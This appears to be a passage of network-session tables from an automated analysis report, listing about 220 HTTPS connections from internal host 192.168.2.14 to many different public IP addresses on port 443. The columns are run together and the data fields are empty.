                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12980192.168.2.144547863.119.218.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12981192.168.2.144658474.143.69.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12982192.168.2.144611648.97.159.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12983192.168.2.1458506199.123.7.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12984192.168.2.1439542112.243.151.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12985192.168.2.1434374198.38.18.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12986192.168.2.1453152166.153.19.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12987192.168.2.144652281.54.41.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12988192.168.2.143553245.86.193.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12989192.168.2.1451644113.246.11.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12990192.168.2.143681058.232.68.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12991192.168.2.1433714147.67.35.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12992192.168.2.1455482193.132.10.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12993192.168.2.143898073.68.142.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12994192.168.2.144459438.35.19.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12995192.168.2.1449032171.133.212.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12996192.168.2.1459358122.99.207.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12997192.168.2.1454456172.216.155.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12998192.168.2.1454736200.117.68.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12999192.168.2.144823890.172.238.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13000192.168.2.1438678104.208.221.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13001192.168.2.1437164201.125.180.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13002192.168.2.145807012.96.26.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13003192.168.2.1433296144.14.11.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13004192.168.2.1454106163.156.149.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13005192.168.2.1441772159.0.253.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13006192.168.2.1446650185.169.192.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13007192.168.2.143670276.1.71.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13008192.168.2.1445210107.94.168.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13009192.168.2.1454204176.118.82.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13010192.168.2.1456048178.210.65.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13011192.168.2.14529688.84.39.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13012192.168.2.144670491.147.241.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13013192.168.2.1433504135.169.125.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13014192.168.2.1435704117.79.65.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13015192.168.2.1433448166.76.26.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13016192.168.2.1444488163.180.109.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13017192.168.2.144364643.68.207.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13018192.168.2.14419205.227.231.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13019192.168.2.145165849.185.82.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13020192.168.2.1447876162.0.23.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13021192.168.2.1435388209.163.188.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13022192.168.2.1442530168.66.178.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13023192.168.2.1438586200.190.216.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13024192.168.2.143723485.8.43.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13025192.168.2.146073427.252.16.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13026192.168.2.1447368205.210.123.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13027192.168.2.144448475.66.118.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13028192.168.2.145882249.137.219.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13029192.168.2.145822684.8.63.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13030192.168.2.1457576143.107.98.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13031192.168.2.1441668202.55.180.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13032192.168.2.1442480144.22.50.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13033192.168.2.1433554148.146.246.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13034192.168.2.1456634124.79.162.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13035192.168.2.1450088220.185.50.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13036192.168.2.1459570106.142.227.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13037192.168.2.1435012186.138.45.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13038192.168.2.1442358103.24.155.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13039192.168.2.145892675.53.171.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13040192.168.2.145913499.29.27.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13041192.168.2.1436986118.59.145.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13042192.168.2.143975695.71.77.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13043192.168.2.1451848150.183.234.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13044192.168.2.1447006129.6.70.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13045192.168.2.1440204206.240.108.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13046192.168.2.1460240198.190.123.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13047192.168.2.1457460152.74.87.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13048192.168.2.1459410113.72.52.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13049192.168.2.1447084130.214.87.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13050192.168.2.14426122.194.197.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13051192.168.2.145587217.142.186.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13052192.168.2.1436472132.237.210.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13053192.168.2.145464661.202.194.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13054192.168.2.1448238176.154.133.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13055192.168.2.1449840220.244.221.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13056192.168.2.144313418.174.232.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13057192.168.2.144666288.222.97.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13058192.168.2.144621018.2.173.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13059192.168.2.1455262140.105.96.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13060192.168.2.143634849.167.99.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13061192.168.2.144626286.216.126.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13062192.168.2.145210465.94.32.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13063192.168.2.1440350124.62.48.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13064192.168.2.1460410210.180.145.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13065192.168.2.1458896178.81.93.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13066192.168.2.1458312145.118.198.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13067192.168.2.143606291.28.183.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13068192.168.2.1446308166.127.1.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13069192.168.2.1434464122.233.144.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13070192.168.2.1445032162.140.206.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13071192.168.2.1434520103.189.100.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13072192.168.2.1441582125.190.165.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13073192.168.2.1443736151.203.14.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13074192.168.2.144862695.1.30.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13075192.168.2.144811865.183.74.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13076192.168.2.144419285.31.174.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13077192.168.2.1438098155.207.49.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13078192.168.2.146008486.93.146.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13079192.168.2.144868698.48.2.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13080192.168.2.1452500148.161.181.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13081192.168.2.1442262179.191.197.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13082192.168.2.144467861.179.61.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13083192.168.2.144399867.61.198.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13084192.168.2.1447594112.25.77.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13085192.168.2.143448077.53.241.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13086192.168.2.1444334173.118.89.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13087192.168.2.1459810217.90.161.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13088192.168.2.1434220156.113.205.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13089192.168.2.1446086205.187.140.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13090192.168.2.143310696.115.29.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13091192.168.2.1452836184.41.55.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13092192.168.2.1438308188.62.252.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13093192.168.2.1436558145.26.225.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13094192.168.2.143888820.248.224.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13095192.168.2.14606105.103.102.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13096192.168.2.145900475.70.222.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13097192.168.2.144519069.93.8.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13098192.168.2.1436296213.29.2.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13099192.168.2.144675034.196.147.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13100192.168.2.144798258.77.118.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13101192.168.2.1448714148.213.56.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13102192.168.2.1435890131.92.90.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13103192.168.2.14562104.214.39.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13104192.168.2.143926227.56.151.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13105192.168.2.1433276133.149.201.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13106192.168.2.1445582111.154.146.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13107192.168.2.145160814.114.243.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13108192.168.2.146015461.99.15.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13109192.168.2.1456520135.158.101.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13110192.168.2.143879639.117.150.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13111192.168.2.145422024.130.255.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13112192.168.2.1433908195.199.74.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13113192.168.2.145296499.72.189.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13114192.168.2.144536266.101.173.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13115192.168.2.1454766114.75.160.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13116192.168.2.144937252.219.154.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13117192.168.2.143891636.25.154.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13118192.168.2.1453028116.93.206.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13119192.168.2.145025068.203.147.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13120192.168.2.144685260.8.105.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13121192.168.2.1438126100.207.224.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13122192.168.2.1453980216.239.79.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13123192.168.2.1439982183.248.13.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13124192.168.2.1435232165.129.41.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13125192.168.2.1440390175.165.48.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13126192.168.2.1448566163.136.164.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13127192.168.2.144010454.224.207.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13128192.168.2.144077446.110.210.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13129192.168.2.1448734199.221.191.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13130192.168.2.145135013.137.63.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13131192.168.2.143478283.246.47.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13132192.168.2.1434326190.251.114.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13133192.168.2.145556266.178.139.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13134192.168.2.1460722202.14.56.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13135192.168.2.145949049.233.184.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13136192.168.2.1439912186.225.97.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13137192.168.2.143349259.178.98.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13138192.168.2.1447428177.168.233.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13139192.168.2.1443324163.72.209.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13140192.168.2.145200414.38.193.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13141192.168.2.1439802211.80.161.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13142192.168.2.1438394142.78.5.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13143192.168.2.145191046.63.62.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13144192.168.2.145239446.214.59.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13145192.168.2.1449198140.9.238.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13146192.168.2.14580568.228.138.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13147192.168.2.1433422156.57.10.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13148192.168.2.1453978159.134.203.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13149192.168.2.1440762130.170.68.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13150192.168.2.1437576203.133.9.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13151192.168.2.1457052189.197.141.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13152192.168.2.143852243.124.230.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13153192.168.2.1458944189.236.119.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13154192.168.2.145987299.36.235.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13155192.168.2.1456786190.190.175.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13156192.168.2.145673837.141.112.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13157192.168.2.145232096.62.229.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13158192.168.2.1439444205.123.96.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13159192.168.2.1458706116.7.196.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13160192.168.2.143724048.22.25.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13161192.168.2.1450050138.252.40.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13162192.168.2.1447380188.135.202.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13163192.168.2.1445546202.241.56.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13164192.168.2.1444286158.153.137.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13165192.168.2.1449984126.199.94.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13166192.168.2.144933462.245.139.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13167192.168.2.14555488.230.145.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13168192.168.2.1457978195.13.98.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13169192.168.2.1434342142.48.189.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13170192.168.2.1443208166.2.192.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13171192.168.2.1436014172.40.223.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13172192.168.2.144486814.1.224.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13173192.168.2.1434646154.85.160.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13174192.168.2.1456562105.187.133.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13175192.168.2.1433556108.6.136.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13176192.168.2.143723092.42.13.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13177192.168.2.1443752125.85.116.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13178192.168.2.1440332124.131.91.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13179192.168.2.145948077.83.2.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13180192.168.2.144844095.142.131.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13181192.168.2.1454560117.164.195.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13182192.168.2.14401901.142.163.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13183192.168.2.144534479.155.191.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13184192.168.2.145394224.176.123.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13185192.168.2.145309067.102.12.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13186192.168.2.1433300107.20.151.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13187192.168.2.1450476133.138.117.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13188192.168.2.1441598170.229.113.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13189192.168.2.1446058187.14.123.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13190192.168.2.1439092140.152.45.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13191192.168.2.1453178103.172.80.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13192192.168.2.14421921.113.141.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13193192.168.2.1449502211.254.148.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13194192.168.2.1459048195.211.229.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13195192.168.2.1452138205.7.254.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13196192.168.2.145363669.193.48.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13197192.168.2.1452088208.69.192.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13198192.168.2.1438544201.78.89.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13199192.168.2.1443290189.160.241.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13200192.168.2.1436074109.120.94.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13201192.168.2.1452708218.8.79.235443
